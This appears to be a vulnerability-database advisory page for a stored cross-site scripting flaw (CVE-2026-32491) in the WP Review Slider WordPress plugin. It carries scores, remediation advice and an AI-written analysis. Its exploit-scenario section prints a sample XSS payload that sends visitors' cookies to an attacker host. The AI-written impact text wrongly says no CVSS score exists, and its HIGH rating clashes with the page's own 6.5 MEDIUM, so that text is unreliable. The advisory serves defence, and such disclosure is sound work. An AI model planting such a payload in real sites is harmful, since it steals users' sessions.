Skip to main content

Wp Review Slider CVE-2026-32491

| EUVDEUVD-2026-15833 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-03-25 Patchstack GHSA-wg43-4pm5-2pqv
6.5
CVSS 3.1 · NVD
View

Vulnerability Assessment

Weakness
CWE
OWASP Top 10:2025
A05:2025 - Injection
ASVS 5.0
V1 - Encoding and Sanitization Output encoding, context-aware escaping
MITRE ATT&CK

2 techniques across 2 tactics: Initial Access, Execution

The technique list with ATT&CK links and the kill-chain view is part of the Basic plan and up.

Impact

While CVSS and CVSS vector data are unavailable, the practical risk is HIGH based on multiple factors: (1) Stored XSS represents a critical vulnerability class with technical impact spanning confidentiality, integrity, and availability; (2) The vulnerability affects a WordPress plugin with potentially wide distribution, meaning many sites could be simultaneously compromised; (3) Stored XSS is highly automatable—attackers can inject payloads once and compromise all subsequent visitors without manual intervention; (4) The ENISA tracking (EUVD-2026-15833) and Patchstack reporting indicate active vulnerability intelligence community engagement; (5) WordPress plugins are frequently targeted and have high exploitation rates. The lack of CVSS scoring may reflect the vulnerability's recent discovery or reporting channel. Without explicit EPSS or KEV status data, assume this warrants immediate patching given the stored nature and plugin distribution model.

Exploit ScenarioDerived

An attacker submits a review containing embedded JavaScript payload (e.g., <img src=x onerror='fetch("https://attacker.com/steal?cookie="+document.cookie)'>) through the WP Review Slider form. Due to improper input sanitization, the malicious script is stored in the database. When any WordPress user or administrator visits the page displaying reviews, the injected script executes in their browser context, exfiltrating session cookies or redirecting them to a phishing site. This affects all site visitors repeatedly until the malicious review is removed or the plugin is patched.

This Month Plan within 30 days. Why: MEDIUM severity (CVSS 4.0-6.9).
No patch listed yet 0.0% exploitation probability (EPSS)

Get an e-mail when this CVE is exploited, patched or re-scored. Free account.

Alert me

AnalysisAIv1 – Mar 25, 2026

A Stored Cross-Site Scripting (XSS) vulnerability exists in the WP Review Slider plugin (also known as wp-facebook-reviews) versions 13.9 and earlier, allowing attackers to inject malicious scripts that persist in the application and execute in users' browsers. This vulnerability affects WordPress site administrators and users who interact with review content. An attacker can exploit this to steal session tokens, deface content, redirect users to malicious sites, or perform actions on behalf of compromised users.

RemediationAI

Immediately upgrade the WP Review Slider plugin to the latest patched version beyond 13.9 by navigating to Dashboard > Plugins > Updates in WordPress and clicking Update, or download the patched version directly from the WordPress plugin repository. Consult the Patchstack vulnerability advisory at https://patchstack.com/database/Wordpress/Plugin/wp-facebook-reviews/vulnerability/wordpress-wp-review-slider-plugin-13-9-cross-site-scripting-xss-vulnerability for confirmation of patch availability and version details. If patching is temporarily delayed, implement Web Application Firewall (WAF) rules to filter common XSS payloads in review submission endpoints, disable the vulnerable plugin until patched, or restrict access to the review slider functionality. Additionally, audit existing reviews in the database for indicators of compromise (unusual JavaScript tags, suspicious event handlers) and remove malicious entries if discovered.

Affected VersionsENISA

WP Review Slider n/a ≤≤ 13.9

Affects your stack

Find out whether the stacks and servers you run are on an affected version.

Checking this CVE against your own stacks and servers is part of the Basic plan and up.

Technical ContextAI · show details

The vulnerability is classified as CWE-79: Improper Neutralization of Input During Web Page Generation, which indicates inadequate input sanitization or output encoding in the review slider functionality. The WP Review Slider plugin (CPE: cpe:2.3:a:jgwhite33:wp_review_slider:*:*:*:*:*:*:*:*) is a WordPress plugin designed to display reviews, likely sourced from Facebook or similar platforms. The Stored XSS variant means malicious input is saved to the database and executed whenever the affected page is rendered, making it a persistent threat affecting all site visitors rather than just a single user session. The root cause stems from the plugin failing to properly escape or sanitize user-supplied data before storing it in the database or rendering it in HTML context.

Know when Wp Review Slider gets its next vulnerability

  • Watch products and get an email when something new is published
  • Check this CVE against your own stack and servers
  • Exploit and PoC references, threat intelligence from 22 sources

No credit card · 7-day full trial

Severity by source

NVD PRIMARY 6.5 MEDIUM
AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
Low

DescriptionCVE.org

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in jgwhite33 WP Review Slider wp-facebook-reviews allows Stored XSS.This issue affects WP Review Slider: from n/a through <= 13.9.

Executive ViewAI

Why It Matters

CVE-2026-32491 presents notable security risk, a cross-site scripting vulnerability rated CVSS 6.5. Attackers could inject scripts to steal sessions or perform actions as authenticated users. Organizations should apply vendor updates when available and monitor for exploitation.

Business Impact: Moderate
Compensating Controls

Apply vendor patch. If patching is delayed: implement CSP headers, enable HttpOnly cookies, deploy WAF XSS rules.

Threat Intelligence Overview

EPSS Score
0.0%
Top 90% exploitable
Data Quality
6 sources
Confidence: High

How this decision was reached

The engine reads each signal below and applies a fixed list of rules from top to bottom. The first rule that matches sets the recommended action – like a statement, every line is shown.

SignalValue
Severity MEDIUM
CISA KEV No
Public POC No
EPSS 0.0%
Patch available No
Active threat No
Deciding rule
MEDIUM severity (CVSS 4.0-6.9)
What every action level means
Emergency Immediate action required. Criteria: CRITICAL + in CISA KEV (actively exploited) without patch, OR CRITICAL + EPSS > 30% without patch, OR CRITICAL + active threat signals without patch.
Act Now Prioritize within 24-48h. Criteria: in KEV with patch available, OR CRITICAL + public POC, OR HIGH + EPSS > 10%, OR CRITICAL + active threat, OR any CRITICAL severity.
This Week Schedule remediation this week. Criteria: HIGH severity (CVSS 7.0-8.9). Patch within normal change window.
This Month Plan within 30 days. Criteria: MEDIUM severity (CVSS 4.0-6.9), lower exploitation probability. Include in regular patch cycle.
Monitor Track and reassess. Criteria: LOW severity (CVSS 0.1-3.9), minimal exploitation risk. No immediate action needed.

SSVC AssessmentENISA

Exploitation
None
System Exposure· derived
Open
Automatable
No
Technical Impact
Partial

Priority Score

32
Low Medium High Critical
KEV: 0
EPSS: 0
CVSS: +32
PoC: 0
Weaponized: 0
Threat intel: 0
Gov advisory: 0

Attack Technique

Cross-Site Scripting occurs when an application accepts untrusted data and sends it to a web browser without proper validation or encoding.

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy